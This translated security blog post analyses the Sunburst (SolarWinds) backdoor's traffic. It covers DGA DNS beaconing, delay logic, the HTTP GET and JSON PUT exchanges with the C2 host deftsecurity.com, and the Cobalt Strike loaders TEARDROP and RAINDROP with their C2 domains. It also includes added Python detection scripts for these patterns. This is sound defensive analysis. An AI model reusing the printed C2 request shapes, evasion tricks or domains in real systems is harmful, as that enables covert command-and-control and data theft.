Article 66: Review and analysis of the entire communication traffic process of the top APT backdoor Sunburst (revised article)


Part 1 Preface

Because the previous version of this article contained some errors, ABC_123 deleted the original; the corrected article was republished last weekend.

Hello everyone, my name is ABC_123. Over the past few weeks we have shared the detailed attack process of the SolarWinds supply chain attack and the design ideas behind the Sunburst backdoor, but many readers still do not understand how the Sunburst backdoor actually communicates. In this issue, ABC_123 walks through the complete communication process of the Sunburst backdoor from the perspective of network traffic. This shows more intuitively how the Sunburst backdoor bypasses traffic monitoring. I also learned a lot from doing it.

Note: Many foreign analysis articles disagree about the communication process of the Sunburst backdoor, and many of their detailed descriptions contradict each other. ABC_123 has reconciled the articles from various security companies according to its own understanding. Some omissions are inevitable, so please point out any errors.

Note: Sunburst backdoor communications evaded Einstein, the U.S. cyber attack defense system that took more than a decade and tens of billions of dollars to build.


Part 2 Prerequisite knowledge of backdoor communication

  • How C2 controls the Sunburst backdoor

The previous article by ABC_123 covered this in detail, so here is only a brief review. The attacker on the C2 server controls the behavior of the Sunburst backdoor indirectly, by resolving the C2 domain name to IP addresses in different ranges. Let's look at a simple example of how the attacker makes the Sunburst backdoor exit permanently.

First, the Sunburst backdoor sends a DNS request for the dga domain name ea99hr2sfen95nkjlc5g.appsync-api.eu-west-1.avsvmcloud.com. The attacker on the C2 server wants the backdoor to exit permanently, so the dga domain name is resolved to the IP address 96.31.172.116. After Sunburst obtains this IP, it looks the address up in the list below and immediately switches to the "Truncate" state: it clears all traces and then terminates execution permanently.

[Figure: list of IP address ranges that the Sunburst backdoor matches resolved addresses against]

  • Diagram of C2 controlling Sunburst backdoor

[Figure: diagram of the CONTINUE (blue), STOP (red) and TARGET (purple) IP ranges used by C2 to control the Sunburst backdoor]

The blue part contains the CONTINUE IP addresses. When the C2 operator resolves the dga domain name to an IP address in the blue part of the figure, it means the operator has not yet decided whether the target is valuable and whether to penetrate further, so the Sunburst backdoor keeps issuing dga domain name requests in order to receive the attacker's next instruction.

The red part contains the STOP IP addresses. If the attacker later finds that the target computer is of little value, or that the protection software installed on it is too strong, and decides to give up on the target, the C2 operator resolves the dga domain name to an IP address in the red part. After Sunburst obtains such an IP, it cleans up its traces and then stops running permanently.

The purple part contains the TARGET IP addresses. If the attacker decides the victim is worth further penetration, the dga domain name is resolved to an IP in the purple part of the figure above, and a CNAME record is returned with it. Sunburst receives this domain name (deftsecurity.com in the figure) and uses it as the domain name of the second-stage HTTP C2 phase, in which it formally starts receiving C2 instructions and returning their execution results.

  • Delay timer

The C2 domain name server does not only control the behavior of the Sunburst backdoor by resolving the dga domain name to IP addresses in different ranges; it also controls how long the backdoor waits before its next request through the last 8 bits (the last octet) of the resolved IP address. For example, when the C2 server resolves the dga domain name to 96.31.172.116, the Sunburst backdoor ANDs the last octet of the IP address with the mask 0x54 to obtain an "AND result", then uses the table below to select a delay range, from which Sunburst randomly picks the actual delay.

[Figure: table mapping the (last octet AND 0x54) result to the delay range from which Sunburst randomly chooses]

  • C2 control backdoor termination case

First, a screenshot from a foreign video, which describes the entire process by which C2 made a Sunburst backdoor terminate.

[Figure: screenshot of the five DNS requests and responses in the termination case]

Step 1   The Sunburst backdoor requests the domain name lf9prvp9o36mhihw2hrs260g12eu1.appsync-api.eu-west-1.avsvmcloud.com. Decoding the lf9prvp9o36mhihw2hrs260g12eu1 part of this domain name with a tool reveals omeros.local, the domain the target machine belongs to. The attacker resolves the domain name to the IP address 8.18.145.139. Sunburst computes on the last octet of the IP address and learns that it must wait one minute before sending the status of the security protection software to the C2 server.

Step 2   After the one-minute delay, the Sunburst backdoor sends its second request and tells the C2 server, through the encoded part of the dga domain name, that the target machine runs Carbon Black endpoint security software. The C2 server resolves the dga domain name to 8.18.145.62. The Sunburst backdoor parses the last octet of the IP address and learns that it must wait 1 day before issuing the next dga domain name request.

Step 3   After the one-day delay, Sunburst asks C2 for instructions by querying another dga domain name. C2 resolves it to 8.18.144.150. Sunburst must wait another day before issuing the next dga domain name request.

Step 4   After the one-day delay, Sunburst queries another dga domain name. C2 resolves it to 8.18.145.151, and Sunburst continues to wait.

Step 5   After the one-day delay, Sunburst queries another dga domain name. C2 resolves it to 20.140.84.127. On receiving this IP, Sunburst immediately understands that C2 wants it to stop running. This shows that the C2 operator judged further penetration of computers in this domain to be of little value and abandoned the target.

This case shows how much effort the Sunburst backdoor puts into avoiding traffic detection. It issued only 5 DNS requests for dga domain names in 4 days, and the domain appsync-api.eu-west-1.avsvmcloud.com looks so much like an AWS domain that security personnel later treated it as a normal domain name request while tracing the source. No backdoor has ever been so patient or waited so long between requests.

Part 3 Complete backdoor communication case

Next, let's look at a complete communication case of the Sunburst backdoor. It covers the backdoor transmitting the victim's computer name and security software status through dga domain names, and C2 sending the backdoor the CNAME domain name for the HTTP C2 communication stage; that is the first stage. In the second stage, the Sunburst backdoor issues HTTP GET requests to fetch instructions, and the third stage is the CobaltStrike backdoor stage.

1 dga domain name transfer stage

[Figure: timeline of the six dga domain name queries and responses of the first stage]

Step 1   2020-06-11 04:00 UTC

Sunburst initiated the query r8stkst71ebqgj66ervisu10bdohu0gt.appsync-api.us-west-2.avsvmcloud.com ⇒ AD domain; the C2 attacker obtains the first part of the domain, "central.pima.g"

Response: 8.18.144.1 ⇒ Sunburst backdoor sleeps for 1 hour and then continues.

Step 2   2020-06-11 05:00 UTC

Sunburst initiated the query ulfmcf44qd58t9e82w.appsync-api.us-west-2.avsvmcloud.com ⇒ AD domain; the C2 attacker obtains the second part, "ov"

Response: 8.18.144.2 ⇒ The Sunburst backdoor sleeps for 1 hour and then continues (at this point the attacker knows the full domain name of the target computer: central.pima.gov).

Step 3   2020-06-11 06:00 UTC

Sunburst initiated the query p50jllhvhmoti8mpbf6p2di.appsync-api.us-west-2.avsvmcloud.com ⇒ No report.

Response: 8.18.144.16 ⇒ The Sunburst backdoor sleeps for 8 hours and then continues (at this point the attacker knows that the target's protection software is turned off).

Step 4   2020-06-11 14:00 UTC

Sunburst initiated the query (?) ⇒ No new report

Response: 8.18.144.17 ⇒ The Sunburst backdoor sleeps for 8 hours and then continues (meanwhile the attacker is evaluating whether the target is valuable and worth further penetration).

Step 5   2020-06-11 22:35 UTC

Sunburst initiated the query j5uqlssr1hfqnn8hkf172mp.appsync-api.us-west-2.avsvmcloud.com ⇒ No report required

Response: 184.72.181.52 ⇒ Sunburst sleeps for 1 to 3 minutes (resolution to this IP address tells Sunburst to prepare for the second phase, the HTTP C2 phase).

Step 6   2020-06-11 22:37 UTC

Sunburst initiated the query 7sbvaemscs0mc925tb99.appsync-api.us-west-2.avsvmcloud.com ⇒ The Sunburst backdoor requests a CNAME

Response: deftsecurity.com ⇒ CNAME of the second-stage HTTPS C2 server (at this point Sunburst resolves the dga domain name, finds that the CNAME value is not empty, takes the CNAME value and uses it as the domain name for the second-stage HTTP C2 communication).
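One way a defender could hunt for this first-stage pattern in resolver logs, written as an added example (not code from the original article). It assumes a simple constructed log format, groups the avsvmcloud.com DGA queries per client, records the (last octet AND 0x54) value Sunburst uses for its delay lookup, the gaps between beacons, and the CNAME hand-off to the second-stage C2 host:

```python
import re
from datetime import datetime
from ipaddress import ip_address

# Constructed resolver log lines modelled on the first-stage walk-through above
# (not captured traffic). Format: "<UTC time> <client> <qname> <type> <answer>".
# The article gives no name for the step-4 query, so that line is omitted.
LOG = """\
2020-06-11T04:00:00 10.1.2.3 r8stkst71ebqgj66ervisu10bdohu0gt.appsync-api.us-west-2.avsvmcloud.com A 8.18.144.1
2020-06-11T05:00:00 10.1.2.3 ulfmcf44qd58t9e82w.appsync-api.us-west-2.avsvmcloud.com A 8.18.144.2
2020-06-11T06:00:00 10.1.2.3 p50jllhvhmoti8mpbf6p2di.appsync-api.us-west-2.avsvmcloud.com A 8.18.144.16
2020-06-11T22:35:00 10.1.2.3 j5uqlssr1hfqnn8hkf172mp.appsync-api.us-west-2.avsvmcloud.com A 184.72.181.52
2020-06-11T22:37:00 10.1.2.3 7sbvaemscs0mc925tb99.appsync-api.us-west-2.avsvmcloud.com CNAME deftsecurity.com
2020-06-11T09:12:00 10.1.2.9 www.example.com A 93.184.216.34
"""

# A long random label under appsync-api.<region>.avsvmcloud.com, as in every query above.
DGA_RE = re.compile(r"^[a-z0-9]{16,40}\.appsync-api\.[a-z0-9-]+\.avsvmcloud\.com$")

def sleep_key(ip_text):
    """Last octet of the A record ANDed with 0x54: the value Sunburst looks up in its delay table."""
    return (int(ip_address(ip_text)) & 0xFF) & 0x54

def find_sunburst_beacons(log):
    """Group DGA queries per client; report sleep keys, gaps between beacons and any CNAME hand-off."""
    hits = {}
    for line in log.strip().splitlines():
        ts, client, qname, rtype, answer = line.split()
        if not DGA_RE.match(qname.lower()):
            continue
        h = hits.setdefault(client, {"queries": [], "cname": None})
        if rtype == "CNAME":
            h["cname"] = answer  # second-stage C2 host delivered instead of an IP
        else:
            h["queries"].append((datetime.fromisoformat(ts), sleep_key(answer)))
    for h in hits.values():
        h["queries"].sort()
        times = [t for t, _ in h["queries"]]
        h["sleep_keys"] = [k for _, k in h["queries"]]
        h["gaps_hours"] = [round((b - a).total_seconds() / 3600, 2) for a, b in zip(times, times[1:])]
    return hits

if __name__ == "__main__":
    for client, h in find_sunburst_beacons(LOG).items():
        print(client, h["sleep_keys"], h["gaps_hours"], h["cname"])
```

The hour-scale gaps and the small number of queries per day are exactly why a per-query rate alert misses this beacon; grouping by client over days, plus the CNAME to a domain outside avsvmcloud.com, is what makes it stand out.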

 2 Initiate an HTTP request to request instructions from C2

The Sunburst backdoor then enters the HTTP C2 communication stage. Sunburst sends the following HTTP request to deftsecurity.com, the CNAME value returned by C2, requesting an xml file:

GET /swip/upd/Orion.UI-5.2.0.xml HTTP/1.1
If-None-Match: bfc145s6149c4290ef3b2c1732449c562a24g66d
Host: deftsecurity.com
Connection: Close

As shown in the figure below, the server returns a file that looks like a normal assembly-description XML file. In reality, the attacker's control instructions are encrypted and hidden in the values of certain fields in this XML.

[Figure: the XML file returned by the C2 server, with the encrypted instruction hidden in field values]

Sunburst obtains the instruction ID and the instruction's additional parameters by parsing the encrypted part of the xml file above; see the table below. If the ID corresponds to Exit, the current thread is terminated. If it is SetTime, the delay time is set from the decrypted additional parameters.

[Figure: table of Sunburst instruction IDs and their meanings]

 3 Return the command execution results to C2

After decrypting the instructions from the xml file, Sunburst executes them and then returns the results to the server. As emphasized in the previous article by ABC_123, if the result is smaller than 10,000, JSON data is sent with a PUT request to a URL ending in .woff2. Sunburst encrypts the execution result and hides it inside the JSON document.

The URL generation rules are as follows (see the previous article for details):

[Figure: URL generation rules for the PUT request that returns results]

The request packet in which Sunburst returns data looks roughly as follows (assembled by ABC_123 from foreign analysis articles; some header information may be missing):

[Figure: reconstructed PUT request carrying the JSON result document]

The request packet is explained as follows:

[Figure: field-by-field explanation of the PUT request packet]

From here on, the Sunburst backdoor repeatedly requests xml files from the c2 domain name to obtain the instructions it must execute, sends the execution results back to the c2 server as a JSON document in a PUT request, and then enters the third stage, in which the CobaltStrike backdoor is used for lateral movement inside the intranet.

 4 CobaltStrike backdoor communication

Now we enter the third stage. Sunburst downloads a vbs script and a Loader program and places them in the C:\Windows directory, disguised as legitimate files. Sunburst then uses image hijacking (Image File Execution Options) to modify the registry and bind dllhost.exe to the command wscript.exe C:\Windows\[folder]\[trigger].vbs. At this point the Sunburst backdoor has completed its mission and the system goes quiet, waiting for dllhost.exe to be executed and thereby run the vbs script. The vbs script runs rundll32.exe to load the malicious dll from the previous step, then removes the image hijacking registry entry for dllhost.exe and cleans up the traces.

  • Deliver TEARDROP Tool

Two variants of TEARDROP were found in total:

The first variant is libintl3.dll. This sample is loaded through rundll32.exe; it reads an image file named upbeat_anxiety.jpg from the current directory, checks that it has a jpg header, and extracts the shellcode from it. The CobaltStrike backdoor then connects to infinitysoftwares[.]com for command and control.

The second variant is NETSETUPSVC.dll, which is started by adding a service. It is loaded through svchost.exe, which calls its exported function NetSetupServiceMain. NETSETUPSVC.dll reuses the code of libintl3.dll, reads the image file festive_computer.jpg from the current directory, and the CobaltStrike backdoor obtains command and control by connecting to ervsystem[.]com.

TEARDROP sets "twitter.com" as the Referer field in its https traffic, which leads security personnel to mistake the C2 domain name infinitysoftwares[.]com for a normal whitelisted domain, thus evading detection.

The traffic data of TearDrop’s CobaltStrike communication phase is as follows:

[Figure: traffic capture of the TEARDROP CobaltStrike communication phase]

  • Deliver the RAINDROP tool

RAINDROP exists as bproxy.dll. It installs a 7z.dll file and extracts the domain penetration tool DSInternals onto the victim machine. The 7z.dll file was built on the 7-Zip open source code as a carrier, with the attack code hidden in the code segment. This backdoor also uses CobaltStrike to gain lateral control of the intranet, communicating with bigtopweb.com. Its Referer is disguised as bing.com so that security personnel mistake bigtopweb.com for a normal whitelisted domain.

At this stage, some CS instances use HTTP command and control servers, and some use the SMB named pipe \\.\pipe\protected_storage for intranet communication. (The complete packet capture was not found; the log below gives the overall picture.)
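The HTTP request shapes described in sections 2 and 3 above, together with the Referer trick used by TEARDROP and RAINDROP, can be turned into simple proxy-log checks. The following is an added example (not code from the original article); the proxy records, the .woff2 path and the JSON body are constructed placeholders, and the Orion-update rule flags every matching request for analyst review rather than deciding on its own which hosts are legitimate:

```python
import json
from urllib.parse import urlsplit

# Constructed HTTP proxy records modelled on the traffic described above (not captured data).
# The .woff2 path and JSON body are placeholders; the article's real URL rule is in its figure.
RECORDS = [
    {"method": "GET", "url": "https://deftsecurity.com/swip/upd/Orion.UI-5.2.0.xml",
     "headers": {"If-None-Match": "bfc145s6149c4290ef3b2c1732449c562a24g66d", "Connection": "Close"},
     "body": ""},
    {"method": "PUT", "url": "https://deftsecurity.com/fonts/woff/PLACEHOLDER.woff2",
     "headers": {"Content-Type": "application/json"}, "body": '{"data": "PLACEHOLDER"}'},
    {"method": "GET", "url": "https://infinitysoftwares.com/news/latest",
     "headers": {"Referer": "https://twitter.com/"}, "body": ""},
    {"method": "GET", "url": "https://bigtopweb.com/api/v1",
     "headers": {"Referer": "https://www.bing.com/"}, "body": ""},
    {"method": "GET", "url": "https://fonts.example.com/a.woff2",
     "headers": {"Referer": "https://www.example.com/"}, "body": ""},
]

# Well-known sites that TEARDROP and RAINDROP put in Referer to make their C2 hosts look trusted.
SPOOFED_REFERERS = {"twitter.com", "bing.com"}

def registered_domain(host):
    """Crude last-two-labels comparison; sufficient for the hosts in this example."""
    return ".".join(host.lower().split(".")[-2:])

def is_json(body):
    try:
        return isinstance(json.loads(body), (dict, list))
    except ValueError:
        return False

def flag_record(rec):
    """Return the detection labels that apply to one proxy record."""
    url, hdr = urlsplit(rec["url"]), rec["headers"]
    labels = []
    # 1) Orion update-check shape: GET /swip/upd/*.xml with If-None-Match. Review the destination host.
    if rec["method"] == "GET" and url.path.startswith("/swip/upd/") and url.path.endswith(".xml") \
            and "If-None-Match" in hdr:
        labels.append("orion-update-lookalike")
    # 2) Fonts are fetched with GET; a PUT carrying JSON to a .woff2 URL is a result-upload channel.
    if rec["method"] == "PUT" and url.path.endswith(".woff2") and is_json(rec["body"]):
        labels.append("json-put-to-font-url")
    # 3) Referer names a trusted site but the request goes to an unrelated domain.
    ref = urlsplit(hdr.get("Referer", "")).hostname
    if ref and registered_domain(ref) in SPOOFED_REFERERS \
            and registered_domain(ref) != registered_domain(url.hostname):
        labels.append("spoofed-referer:" + registered_domain(ref))
    return labels

def scan(records):
    return [(urlsplit(r["url"]).hostname, flag_record(r)) for r in records]
```

The third rule is the general form of the point made about TEARDROP and RAINDROP: a Referer is only meaningful when the page that claims to link to a resource actually lives on a related domain.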

The traffic data of RainDrop’s CobaltStrike communication phase is as follows:

[Figure: traffic log of the RAINDROP CobaltStrike communication phase]

Part 4 Summary

1. After installation, the Sunburst backdoor waits a random 12 to 14 days before it is actually activated and starts executing. The security device logs of some organizations are retained for only about 12 days before being overwritten by new logs.

2. In the initial C2 communication stage, in which basic information such as the intranet computer's domain name and security protection software is collected, the traffic is hidden inside dga domain names and is hard to detect. Moreover, the Sunburst backdoor issued only 4 or 5 dga domain name requests over 3 or 4 days, and such low-frequency access is even harder to detect.

3. Low-value targets are terminated immediately so that they are not discovered by detection equipment.

4. In the end, the attacker selected only about 1% of targets, the valuable ones, for lateral penetration of the intranet, and gave up targets with strong security protection. This trade-off reduces the probability of discovery.

5. The IP address ranges used for dga domain name resolution belong to Microsoft, Google and Amazon, so detection software easily adds them to the whitelist. The entire communication looks like normal traffic and is hard to identify.

6. The dga domain name appsync-api.us-west-2.avsvmcloud.com used by the Sunburst backdoor confuses security personnel tracing the source, who mistake it for an AWS domain name.

7. In summary, you can see how subtle Sunburst's design is; its concealment at the traffic level is remarkable. ABC_123 will continue to share how FireEye traced the source of this attack. Stay tuned.


The public account focuses on sharing network security technology, including APT event analysis, red team attack and defense, blue team analysis, penetration testing, code audit, etc. One article per week, 99% original, so stay tuned.

Contact me: 0day123abc#gmail.com(replace # with @)


Origin blog.csdn.net/m0_71692682/article/details/131606995